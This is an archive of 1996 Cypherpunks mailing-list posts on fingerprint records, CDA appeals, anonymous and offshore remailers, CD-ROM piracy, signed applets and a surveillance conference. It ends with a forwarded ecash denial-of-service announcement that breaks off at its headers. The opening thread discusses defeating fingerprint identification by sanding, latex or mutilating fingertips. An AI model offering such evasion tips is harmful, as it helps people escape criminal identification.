> > > certificates vary from jurisdiction to jurisdiction.  Cross the border to
> > > a state and a hospital birth annoucement is enough for a drivers license,
> > > cross again and 4 pieces and a note from mom isn't enough.
> > > 
> > > Be careful with disinformation please.
> > > 
> > 
> > My point is not about the variance of seals and certificates (I have at 
> > least 6 different ones prove it from 4 different states). That is a 
> > given. It is that prints have been a generally accepted practice for some 
> > time now. IF you want to make the case and go back to the early days 
> > (pre-WWII), then people like attila and a few others don't have them - 
> > and I'll concede the point on that basis.
> 
> Again, the point is that states can't decide if they want the task of
> printing and sorting and collecting and storing such records.  It's not
> cheap.  Even if it were, some states just don't care.
> 
> If you're trying to tell me that few if any unsolved cases involving
> "unmatched" prints were committed by people younger than 55-60, I think
> you might reconsider.  That's what your "everyone since WWII" statement
> implies.  If that is so, why does the FBI maintain thousands of active
> "waiting for print-person link" records for unsolved cases?

I'm not interested in unsolved cases (crimes) that involve unmatched 
prints. It really is irrelevant to the discussion. There are too many other 
mitigating factors that influence the course of such an investigation. 

Again, I will state, it's a data warehousing problem to locate such 
information (presuming it exists). You have to know where to look before 
chasing down the most likely candidate.

> 
> Either 1. - Not everyone born is printed or 2. - Hospitals who print don't
> bother to submit to state or federal agencies because they (a) are not
> required to (b) don't much care.
> 
> The answer is actually (3) all of the above.

Agreed.

> 
> > The information I received has come from inquiries to folks I know within 
> > the AMA, several different hospital adminstration staff in various states 
> > - whose job it is to handle such affairs, and few other people who make 
> > it their business to know such trivia. IF the information is in error, 
> > I'll gladly accept correct input. Next time, don't be so quick to accuse 
> > without inquirying to context. I'm not J.Bell.
> 
> Again, even what the AMA says has little to do with state and individual
> hospital practice.  Of the printing that goes on, most infant
> identification is done for internal hospital records, and most involves
> ONLY foot prints.
> 

Agreed, however, I didn't think I represented a hands only premise. 

...Paul






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Sat, 18 May 1996 19:20:29 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.SUN.3.93.960515194016.10635M-100000@polaris.mindport.net>
Message-ID: <Pine.3.89.9605152359.A895-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 15 May 1996, Black Unicorn wrote:

> On Wed, 15 May 1996, Paul S. Penrod wrote:
> > On Tue, 14 May 1996, Black Unicorn wrote:
> > > Paul S. Penrod wrote:
> 

<...>

> > > > Doesn't always work. Partials can be extrapolated to yield a
> > > > relative match.
> > > 
> > > Depends on what you are looking to do.  If your goal is to deter random
> > > searching through a national database, mutilation will probably be very
> > > effective.  If they have the prints of the murderer (you) and you're a
> > > suspect, mutilation aside from actually removing the fingers isn't going
> > > to do anything.
> > 
> > If there is a serious crime involved, partials are sufficient to make the 
> > "guest list" if there are other mitigating factors to even suspect you 
> > might be involved. That's doesn't mean you'll make it to the top, but it 
> > can certainly cause some painful scrutiny.
> 
> Again, it depends on the degree of "mutilation."  Distortion of major
> features is fairly effective even against partial attempts which are
> matched by computer.

Agreed, but there are other factors to consider. For example, it is not 
everyday that someone runs their fingers over sandpaper (via sander or 
not). This may indeed destroy the tell-tale finger print initially, but 
it leaves a distinguishing pattern, that can be matched to other evidence 
such as blood, DNA, fiber, etc. In some instances like this, the computer 
is useless to match finger prints, and balance of the decision rests with 
incriminating evidence. To wit: the "mutilated pattern" provides key 
identification if a good print is lifted and matched directly to the 
suspect - even though a copy of the "new" print doesn't exist.

> 
> [Laytex]

The smart ones use this for starters..

> 
> > > > Wont work. The hands are checked first for signs of tampering.
> > > 
> > > See above about tech end around.
> > 
> > Again, process will work, but not allowed in context of clearance.
> 
> Concur.
> 
> > Scraping the fingertips runs the risk of leaving trace marks that are 
> > just as good as the ridges you tried to remove - even better if you've 
> > left finger prints as a result. The point to the game is not to search 
> > any database, but to produce a verifiable match with evidence at the 
> > scene of any crime. In the case of a clearance, it is to start or 
> > validate an identification process. IF validation is unobtainable via 
> > fingerprints, then the issuing body can employ other means (such as 
> > retinal scans) or deny clearance all together.
> 
> Careful.  Even Central Intelligence Agency print requirements are for
> criminal background check only.  They will run through FBI files and so
> forth and keep the prints for their records, but they are rarely if ever
> used as identification verification per se.
> 
> This is because not everyone in the world has fingerprint files floating
> around.  If you are getting printed for the first time ever and you
> distory or mutilate, there's nothing to compare to.  Further, if you just
> distort, you're prints later might not match well when computer searches a
> nationwide database (which excludes CIA employees in any event).
> 
> It's all about application.

I never maintained that the CIA or other body employs more than the standard 
issue. What I am saying is that there are other methods out there to 
validate means believed to be compromised - should a situation warrant 
such invasive techniques. I have never encountered any situation that 
called for anything other than fingerprints - even inside DoD (which in 
my opinion can be far more paranoid than the agencies).

> 
> To repeat, if you're looking to "estlablish" a false print index,
> distortion is a good way to do it.
> 

Agreed.

> If you're looking to evade a search which has already narrowed you down
> well, hack off some fingers.
> 

whatever...

...Paul






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 18 May 1996 12:57:39 +0800
To: froomkin@law.miami.edu>
Subject: Re: (legal) Re: CDA Dispatch #10: Last Day in Court
In-Reply-To: <Pine.SUN.3.91.960515104943.13592C-100000@viper.law.miami.edu>
Message-ID: <claeSc600YUz0uOjMH@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 15-May-96 Re: (legal) Re: CDA
Dispatch. by Michael Froomkin@law.mia 
> If the legal issue was presented for decision below, and forms a part of
> the notice of appeal, then it is properly preented to the court of appeal,
> regardless of what the court below actually did.  Any other rule would

Speaking of appeals, I've been thinking about what happens with the CDA.
Okay, so we have two court cases going on, the Shea v. Reno case in NYC
and the coalition lawsuits combined in Philly.

What happens if the DoJ loses both the NYC and Philly cases and (as they
said they would) appeals to the Supreme Court. Won't they take the
weaker of the two cases, which is Shea's?

And what happens if we win but Shea loses -- does the DoJ appeal in
Philly and Shea appeals in NYC?

If we lose, does our appeal automatically go to the Supreme Court? The
language in the statute is unclear here -- it only specifices what
happens when the law is declared unconstitutional. But if it isn't,
can't the DoJ argue that our appeal should go to the Third Circuit
instead?

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 18 May 1996 13:33:49 +0800
To: hfinney@shell.portal.com>
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <199605151758.KAA25847@jobe.shell.portal.com>
Message-ID: <klaeaGG00YUzIuOXsL@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 15-May-96 Re:  SEVERE undercapacity,
.. by Hal@shell.portal.com 
> After all, what is the purpose of anonymous remailers?  It isn't really
> to allow harrassing and abusive messages to be sent to one's enemies.
> And it isn't to defeat intellectual property laws by proving that no one
> can stop this material from being posted (remailers can't succeed in
> doing this, as I said above).  Rather, I view remailers as a natural
> extension of encryption.

Has anyone considered how the online copyright legislation being
considered in the House and the Senate may affect anonymous remailers?
There are some interesting provisions, such as requiring the provider of
a service or a network to take steps including "removing, disabling, or
blocking access to the material claimed to be infringing."

Also, each ISP would have to register an agent with the U.S. Copyright
Office to accept service, etc.

By my reading, anonymous remailers don't follow into the "local
exchange, trunk line, or backbone" provisions of the law.

The legislation likely will move through Congress largely intact -- at
least that's the reading I got from the House judiciary subcommittee
today.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 18 May 1996 04:36:58 +0800
To: dsmith@prairienet.org
Subject: Re: (Fwd) New Anonymous Remailer
Message-ID: <199605160015.RAA11960@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: dsmith@prairienet.org
              Cypherpunks <cypherpunks@toad.com>

** Reply to note from David E. Smith <dsmith@midwest.net> 05/15/96 11:33am -0600


	Is this for real --with an intialial address of ARL.MIL

	So, does this mean we now have a fourth option for a NSA dummy remailer 
    besides the three the scuttlebutt says they already operate?


= ------- Forwarded Message Follows -------
= From:          privacy@interlink-bbs.com
= Subject:       New Anonymous Remailer
= Date:          Wed, 15 May 1996 06:34:02 GMT
= To:            info-pascal@ARL.MIL
= 
= 
= 
= 
= You may be familiar with anon.penet.fi, which give you an
= anonymous account.
= 
= Our service allows YOU to choose what the return address will be!
= 
= Please write for more info.


--
"the slammer and the firing squad are 
   just stones on the road to freedom." 
        --attila








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gregg Weissman <geeman@best..com>
Date: Sat, 18 May 1996 03:43:33 +0800
To: "'E. ALLEN SMITH'" <lyalc@ozemail.com.au>
Subject: RE: Java & signed applets
Message-ID: <01BB42BC.F0F08500@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain



Well,that day is not all that far off, when there is trusted h/w, or trusted components, on the desktop.
This will be the usual two-edged sword ....

----------
From: 	Lyal Collins[SMTP:lyalc@ozemail.com.au]
Sent: 	Thursday, May 16, 1996 8:02 AM
To: 	E. ALLEN SMITH
Cc: 	Cypherpunks@toad.com
Subject: 	Re: Java & signed applets

Signing anything is somewaht a waste of time, unless the verification
siftware is highly trusted, and there is good intergity/authenticity
control of the root public key(s).
So, in geneal - ho hum - until trusted hardware is available on the 
desktop.
lyal
-- 
All mistakes in this message belong to me - you should not use them!








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 18 May 1996 07:58:22 +0800
To: RANTpunks <cypherpunks@toad.com>
Subject: Pointer to CFV for comp.security.pgp.*
Message-ID: <Pine.GUL.3.93.960516002257.5896G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Please do not redistribute the actual CFV. I'm sure the group will pass;
this just FYI, in case there's anyone here interested in a forum for
discussing cryptography.

See article <832200127.21555@uunet.uu.net> in news.announce.newgroups.

-rich






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 18 May 1996 11:57:09 +0800
To: Vipul Ved Prakash <vipul@pobox.com>
Subject: Re: Securing CDROM from piracy
In-Reply-To: <199605142323.EAA00118@fountainhead.net>
Message-ID: <Pine.GUL.3.93.960516002630.5896H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Just put your .signature on the CD. Nobody would dare counterfeit that.

-rich

On Wed, 15 May 1996, Vipul Ved Prakash wrote:

> We have developed a multimedia resource that will be cut on a CD-ROM for
> retailling. Since we don't have our own distributers newtwork we will be
> collobarating with another firm for distribution. Is there any way of making
> sure that the guy doesnt pull a fast on on us? Can we ensure that he cannot 
> duplicate the thing and start selling it without sharing the profit. Or 
> alternatively is there any protocol we could follow that will ensure a fair
> game?
> 
> Vipul
>  
> 
> -- 
> 
>         .od8888bo.                              \|/
>      .d%::::88::888b.       	     	       (@ @)
>    .d888::::::::8:888%.   ------------------oOO-(_)-OOo-----------------
>    88888:::::::88888::%.  You walk across with your flowers in your hand
>   d888888:::88;888888::b       Trying to tell me no one understands
>   888888888:888888888888   Trade in your hours for a hand full of dimes
>   Y8888888::::::888888%P         Gonna make it baby in our prime.
>   '8888888:::::::8888:%'  ----------------------------------------------
>    '88888888:::888888%'   Vipul Ved Prakash        Fax : +91-11-3328849
>      '8888888::88888%'    Positive Ideas.     Internet : vipul@pobox.com
>         '"Y88%B8P"'       ----------------------------------------------    
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Sat, 18 May 1996 11:23:19 +0800
To: sawyer@nextek.com (Thomas J. Sawyer)
Subject: Re: Securing CDROM from piracy
In-Reply-To: <v02140b00adc0e030c8b3@[199.173.75.127]>
Message-ID: <199605151946.AAA00148@fountainhead.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >Is there any way of making
> >sure that the guy doesnt pull a fast on on us? Can we ensure that he cannot
> >duplicate the thing and start selling it without sharing the profit.
> 
> Well, I suppose you could get it copyrighted before you hand it over for
> distribution.  I'd also put my logo and other info somewhere in the code,
> such as an "About" box.  They would have a hard time saying it wasn't
> yours.
> 
You are missing the point. Lets say a firm X is marketing my product. Now if
they sell 500,000 copies and tell me that they have sold only 100,000, I have
no way of figuring out. 


-- 

        .od8888bo.                              \|/
     .d%::::88::888b.       	     	       (@ @)
   .d888::::::::8:888%.   ------------------oOO-(_)-OOo-----------------
   88888:::::::88888::%.  You walk across with your flowers in your hand
  d888888:::88;888888::b       Trying to tell me no one understands
  888888888:888888888888   Trade in your hours for a hand full of dimes
  Y8888888::::::888888%P         Gonna make it baby in our prime.
  '8888888:::::::8888:%'  ----------------------------------------------
   '88888888:::888888%'   Vipul Ved Prakash        Fax : +91-11-3328849
     '8888888::88888%'    Positive Ideas.     Internet : vipul@pobox.com
        '"Y88%B8P"'       ----------------------------------------------    





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Sat, 18 May 1996 13:03:59 +0800
To: sunder@dorsai.dorsai.org (Ray Arachelian)
Subject: Re: Securing CDROM from piracy
In-Reply-To: <Pine.SUN.3.91.960516121646.8786A-100000@dorsai>
Message-ID: <199605151949.AAA00160@fountainhead.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Wed, 15 May 1996, Vipul Ved Prakash wrote:
> 
> > We have developed a multimedia resource that will be cut on a CD-ROM for
> > retailling. Since we don't have our own distributers newtwork we will be
> > collobarating with another firm for distribution. Is there any way of making
> > sure that the guy doesnt pull a fast on on us? Can we ensure that he cannot 
> > duplicate the thing and start selling it without sharing the profit. Or 
> > alternatively is there any protocol we could follow that will ensure a fair
> > game?
> 
> 
> Think serial numbers that are cryptographicaly secure.  If you're the 
> only one giving them out and only to registered users, nobody can pirate 
> without it being traced back to them.  Basically have your softrware 
> disable itself after say 30 days unless a serial number is enterded.

Enlighten me! keeping in mind that the distributer will be cutting the CD and
the customer will never be in contact with us. 

Cheers,
Vipul
-- 

        .od8888bo.                              \|/
     .d%::::88::888b.       	     	       (@ @)
   .d888::::::::8:888%.   ------------------oOO-(_)-OOo-----------------
   88888:::::::88888::%.  You walk across with your flowers in your hand
  d888888:::88;888888::b       Trying to tell me no one understands
  888888888:888888888888   Trade in your hours for a hand full of dimes
  Y8888888::::::888888%P         Gonna make it baby in our prime.
  '8888888:::::::8888:%'  ----------------------------------------------
   '88888888:::888888%'   Vipul Ved Prakash        Fax : +91-11-3328849
     '8888888::88888%'    Positive Ideas.     Internet : vipul@pobox.com
        '"Y88%B8P"'       ----------------------------------------------    





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 18 May 1996 12:12:03 +0800
To: jamesd@echeque.com
Subject: Re: crosspost re remailers
In-Reply-To: <199605152129.OAA17876@dns2.noc.best.net>
Message-ID: <Pine.GUL.3.93.960516004719.5896I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996 jamesd@echeque.com wrote:

> Some nyms are valuable, most are valueless by design.  All remailers
> should be valueless by design.  The penet.fi remailer design is 
> unsatisfactory precisely because it penet.fi is valuable, hence a
> target.  If it gets shut down a lot of people lose their nyms, 
> causing much inconvenience.

The entry points into the system, though, have value. You need to be able
to locate and trust them. Remailer reputations are valuable. Otherwise,
you're liable to send your message into the NSA-remailers-are-us system.
You need a web of trust among remailers at the very least, which means
some level of exposure (at least by "social analysis" by observing the
relationships among the various remailer nyms).

Chaos within the system is good. Moving remailers around could be good,
provided that a service location infrastructure is established. Raph's
list is a good start, but it needs to be more automatic and dynamic --
which to me (perhaps wrongly) suggests formalization, which means points
of failure. 

A system whereby you post messages to a public place -- like Usenet -- to
be picked up by a random remailer whose location you do not know could be
attractive, but there's a lot that could go wrong.

I've been assured that the Cypherpunk Cabal (there is no cabal) is working
on the problem.

-rich
 "Outlay encryption, and only outlaws will have steganography."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.org>
Date: Sat, 18 May 1996 10:30:02 +0800
To: cypherpunks@toad.com
Subject: COMPLETELY ANONYMOUS POSTING & E-MAIL (fwd)
Message-ID: <Pine.SUN.3.91.960516015120.25850A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Posted in one of the sex newsgroups...


In article <4n02a7$ime@newsbf02.news.aol.com> shhhnet@aol.com (ShhhNet) writes:
From: shhhnet@aol.com (ShhhNet)
Subject: COMPLETELY ANONYMOUS POSTING & E-MAIL
Date: 10 May 1996 14:35:51 -0400

COMPLETELY ANONYMOUS POSTING & E-MAIL
Send and receive E-Mail and Post to newsgroups with TOTAL anonymity  

As you must know the government is getting ready to crack down on freedom
of speech on the internet.  Already people are being fined and imprisoned.
Your service providers are being asked to turn over records and they are
cooperating.  Even if they don't want to cooperate the can be forced by
the courts to release records to the authorities.
Our New Service let's you send and receive E-Mail and post to newsgroups
with no fear of your messages ever being traced to you.  Not even a
Federal Court Order will result in your identity being revealed.  Finally
total safety for your most confidential or controversial electronic
messages.

ShhhNET Will begin operating in late June and you can be a part of the
only truly secure way to send and receive E-Mail or post to UseNet
Newsgroups.  For a limited time ShhhNet will be offered for only $50.00
per Year.  If you are interested, Please send E-Mail to ShhhNet@AOL.Com 
We will respond with information about how our service works and how you
can be totally secure in your Internet transactions.  









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remailer@2005.bart.nl (Senator Exon)
Date: Sat, 18 May 1996 10:16:04 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605160218.EAA03364@spoof.bart.nl>
MIME-Version: 1.0
Content-Type: text/plain


> From: tilman@berlin.snafu.de (Tilman Hausherr)
> Newsgroups: alt.religion.scientology
> Subject: fwd: Major Domo
> Date: Wed, 15 May 1996 17:36:49 GMT
> Organization: Xenu's Ranch
> Lines: 28
> Approved: xenu@galactic.org
> Message-ID: <319a0a59.33945517@news.snafu.de>
> Reply-To: tilman@berlin.snafu.de
> NNTP-Posting-Host: pppx179.berlin.snafu.de


Does Lieberman believe that Major Domo is scamizdat ?


 14  Q     I see.  So there's something called a
 15  Cypherpunks list?
 16  A     Yes.
 17  Q     Who maintains that?
 18  A     Major Domo.
          [majordomo]
 19  Q     Major Domo is an individual?
 20  A     No, no.  Major Domo is a bot.
 21  Q     A what?
 22  A     A bot.
 23  Q     What's a bot?
 24  A     A robot like.  It's short for robot.
 25  Q     Uh-huh.  And this robot is obviously maintained
 26  by somebody, right?
0050
 01  A     Not very much.  In fact, it's hardly ever
 02  touched.
 03  Q     Where does it sit?
 04  A     I don't know at this point.  It was a year ago,
 05  which was about the last time I was reading the
 06  Cypherpunks list, it was on Hoptoad.
 07  Q     How would one go about getting the Cypherpunks
 08  list?
 09  A     Subscribe Cypherpunks.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sun, 19 May 1996 05:52:47 +0800
To: cypherpunks@toad.com
Subject: NOISE.SYS Info Distribution List
Message-ID: <199605160708.DAA29012@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


I've set up a distribution list for NOISE.SYS. If you want to receive
periodic announcements about new versions, bugs, related utilities, etc.,
reply to <wlkngowl@unix.asb.com> with the subject "add noise.sys-list"

(NOISE.SYS is a crypto-quality RNG device for MS-DOS, similar to the
random.c implementation for Linux. The latest version is 0.5.6-Beta.)

Rob (aka "Deranged Mutant")








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 18 May 1996 18:02:04 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU
Subject: Re:  Why does the state still stand:
Message-ID: <199605161419.HAA05109@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
> I did not
> include offshore.com.ai in Anguilla due to its high cost; I consider anything
> over 25$ a month to be impractical.
> 
> _Country/Area_  _Name_                          _Email_
> Anguilla        Cable & Wireless                webmaster@candw.com.ai
> [...]

Thanks very much for making this list.  However I would not be so quick
to reject http://offshore.com.ai.  It is run by long-time Cypherpunk
Vince Cate, apparently specifically for the kinds of purposes we are
discussing.  His project was discussed in a recent issue of Wired, I
think the May issue.  (I have no contact with Cate, and have never met
him as far as I can recall.)

For doing something like running a remailer which will post material
which is illegal and/or copyrighted in the U.S., you are going to need a
service which can stand up to pressure.  Presumably some monetary
incentive is going to be a necessity.  Of course by this standard $25 a
month is pretty inconsequential.

One issue is whether these banking-secrecy countries like Anguilla are
followers of the Berne convention or other international copyright
regulations.  Banking secrecy and software piracy don't necessarily go
hand in hand.  I hear a lot about copyright violations in China but not
in the Caribbean.  So actually it isn't clear that this country is the
right location for a remailer that can post arbitrary material.

As for the costs to the remailer operator, he simply passes those on to
his customers.  I think in the long run onshore remailers will be forced
to take measures to restrict copyright-violating posts.  So if your
choice is between paying nothing and not getting your whistle-blowing
message posted, or paying $10 and getting it out on the nets, then
hopefully it is worth that much to you.

We have discussed for-pay remailers and the consensus has been that no
one would use them when others run for free.  However now I think the
false premise is being exposed, that free remailers simply will not be
able to run in the current mode for much longer.  Once a single remailer
operator has been fined thousands of dollars because somebody posted some
copyrighted message, I don't think you will find many people eager to
sign up as operators.  So this dream of a volatile collection of
remailers popping up and going away just doesn't work in my view.  Why
would anyone offer a service knowing that he was exposing himself to
liability like this?  It would be just a game of Russian roulette,
waiting to see whether it is your remailer which gets the bullet in the
form of a post which violates the copyright of someone with deep
pockets.

Hal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyal Collins <lyalc@ozemail.com.au>
Date: Thu, 16 May 1996 16:03:46 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Java & signed applets
In-Reply-To: <01I4PWRN40EO8Y5DM8@mbcl.rutgers.edu>
Message-ID: <319B436D.507E@ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Signing anything is somewaht a waste of time, unless the verification
siftware is highly trusted, and there is good intergity/authenticity
control of the root public key(s).
So, in geneal - ho hum - until trusted hardware is available on the 
desktop.
lyal
-- 
All mistakes in this message belong to me - you should not use them!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Sat, 18 May 1996 19:42:10 +0800
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: AST II Conference
Message-ID: <n1379887180.5604@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


Panel suggestions are always welcome

 -d


-------
                     Preliminary Conference Announcement

    
                   ADVANCED SURVEILLANCE TECHNOLOGIES II
 
                                Sponsored by

                            Privacy International
                   Electronic Privacy Information Center

                             September 16, 1996
                                    
                  Citadel Ottawa Hotel and Convention Centre
                                Ottawa, Canada

----------------------------------------------------------------------------

The rapid evolution of technology is leading to the creation of a seamless
web of surveillance across much of the world. Powerful technologies
originally developed for the military are being adopted by law enforcement
and civilian agencies, and private companies to monitor entire populations.
This has been further fueled by the end of the Cold War and increasing
demands for greater bureaucratic efficiency. Existing laws and regulations
have failed to keep up with these developments.

This one day conference will examine a range of advanced surveillance
technologies and their impact on privacy and other civil liberties. It will
explore the process of planning and implementation of the technologies,
their operating conditions, and the people and organizations responsible for
them. The conference will also examine possible technical, regulatory and
legal responses.

The conference will also address in detail the findings of Privacy
International's "Big Brother Incorporated" report which examined the
international trade in surveillance technology and the involvement of the
arms industry.

----------------------------------------------------------------------------


PARTIAL LIST OF SPEAKERS

Phil Agre, University of California, San Diego
Dave Banisar, Electronic Privacy Information Center
Colin Bennett, University of Victoria
Simon Davies, London School of Economics & Director, Privacy International
Wayne Madsen, Author, Handbook of Personal Data Protection
Bruce Schneier, Counterpane Systems & Author, Applied Cryptography


CONFERENCE SUBJECTS

   * Artificial Intelligence Systems
   * Biometric Identification
   * Digital Cash
   * Information Superhighways
   * Information Warfare
   * Infrared and Passive Millimeter Wave Detectors
   * Intelligent Transportation Systems
   * Other New Technologies

----------------------------------------------------------------------------

MORE INFORMATION

More information on the conference will be available at the Privacy 
International mailing list at pi-news@privacy.org (subject: subscribe) or 
at the PI Home Page at http://www.privacy.org/pi/conference/ottawa/

----------------------------------------------------------------------------

HOTEL

The Conference will take place at Ottawa Citadel Hotel in Ottawa, Canada. A
block of rooms has been reserved at the hotel at a discounted rate of CAN
$81.00/night for a single $91/night for a double. The hotel should be
contacted directly for reservations, mentioning the AST II Conference to get
the special rates and early reservation is recommended. The address is
Ottawa Citadel Hotel, 101 Lyon St., Ottawa, Canada K1R 5T9, attention
reservations, fax 613-237-2351, phone 613-237-3600. In North America you can
call toll free at 1-800-567-3600.

----------------------------------------------------------------------------

OTHER EVENTS THAT WEEK

There are several other conferences in Ottawa that week. On Tuesday, 
September 17, Industry Canada will be sponsoring a one day Symposium and 
Demonstration of privacy enhancing technologies. On September 18 - 20, 
the Privacy Commissioner of Canada will be hosting the 18th International 
Privacy and Data Protection Conference. Contact: 613-995-2410 or email 
jroy@nstn.ca.

----------------------------------------------------------------------------

REGISTRATION

Registration Fees

[] Standard - $250 CAN ($175 US)
[] Non-profit organizations/Educational - $125 CAN ($75 US)

Information

Name:     ___________________________________________________________

Organization:  ______________________________________________________

Address:    _________________________________________________________
 
   __________________________________________________________________

Phone/Fax:  _________________________________________________________

Electronic Mail:_____________________________________________________

Credit card Number/Expiration Date: _________________________________
 (Do Not Email!)


Fax Registration form and credit card number to +1 202.547.5482

Send Check or Money Order in $US made out to Privacy International to:

        Privacy International Washington Office
        666 Pennsylvania Ave, SE, Suite 301
        Washington, DC 20003 USA
        1-202-544-9240 (phone)
        1-202-547-5482 (fax)
        pi@privacy.org(email)

----------------------------------------------------------------------------




_________________________________________________________________________
Subject: AST II Conference
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://www.epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay.Olbon@dynetics.com (Clay Olbon II)
Date: Sat, 18 May 1996 18:16:04 +0800
To: cypherpunks@toad.com
Subject: Re: Edited Edupage, 9 May 1996
Message-ID: <v01540b01adc0d10ee409@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:32 PM 5/15/96, Jim McCoy wrote:
>There are two kinds of libertarians, those who hate the poor and those who
>don't.  I always seem to meet the former, I am beginning to suspect the
>latter don't exist.

I think there is a great deal of misunderstanding here.  I can speak for no
one other than myself, but I don't "hate the poor", nor do I feel no
compassion towards misfortunate people.  However, I have to be realistic -
I approach problems analytically, not emotionally.  My emotions tell me
that spending more money is a good thing.  My reason tells me that we have
"been there, done that" and it DOESN'T WORK.  After spending more than a
trillion $$ on the "War on Poverty" we are worse off than we were before.
Can anyone point to ANY evidence that this money was well spent?  If not,
then why should we spend more?  It is time to look for new solutions.


At 9:09 AM 5/15/96, Doug Hughes wrote:
>Where is somebody making less than $5000/year going to move to?
>(Answer: somewhere rural and poor).  Or, if you prefer, they can
>move into tax-payer subsidized housing? (I'd prefer not, thanks)

Why wouldn't your income change when you move?  In my area, you can make
over $6/hour working at McDonalds ($12K/year).  I know several people who
work two jobs.  I know of families (almost all immigrants BTW) that work
their tails off running small businesses.  It isn't about education, it is
about hard work.  Of course hard-work can help to get a good education.

also Doug Hughes:
>environment, lack of education, lack of money, lots of factors. Nobody
>is holding a gun to anybody's head saying "Don't Read". But improving
>literacy is a goal that needs to be undertaken. Do you not agree that
>low literacy is a bad thing and needs to be taken care of? If not, why
>not? Naturally, you can't force someone to read who doesn't want to.
>But, why, given a good learning environment and an inspiring teacher
>would you not want to?

So how do we go about makeing education better?  More money doesn't work,
having a net connection probably won't help, even having more computers
doesn't make a substantial difference.  It all comes down to the fact that
people need to be responsible for their own actions.  Nowadays, you can
grow up illiterate, and expect to get food stamps, free housing, welfare,
etc, the cash equivalent of which approaches $20K/year in many places.  Or
you can become a capitalist and make big $$ selling "illegal substances".
These "consequences" are the result of people with good intentions,
thinking with their emotions instead of their minds.  Maybe it is time to
become callous and see how that works.  Can things get much worse?

        Clay


---------------------------------------------------------------------------
Clay Olbon II            | Clay.Olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: on web page
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
                     TANSTAAFL
---------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 18 May 1996 17:58:20 +0800
To: cypherpunks@toad.com
Subject: HUGE denial of service attack against any ecash customer!!!
Message-ID: <v03006626adc0d911a83a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg seems to be on a roll. First he figured out how to find out
how anyone can determine anyone else's ecash mint balances, and now he does
this.

The man's a genius. If you don't believe it, ask me, I'll tell you. ;-).

Cheers,
Bob Hettinga



--- begin forwarded text


To: ecash@digicash.com
Path: not-for-mail
From: iang@cs.berkeley.edu (Ian Goldberg)
Newsgroups: isaac.lists.ecash
Subject: HUGE denial of service attack against any ecash customer!!!
Date: 15 May 1996 16:09:29 -0700
Organization: ISAAC Group, UC Berkeley
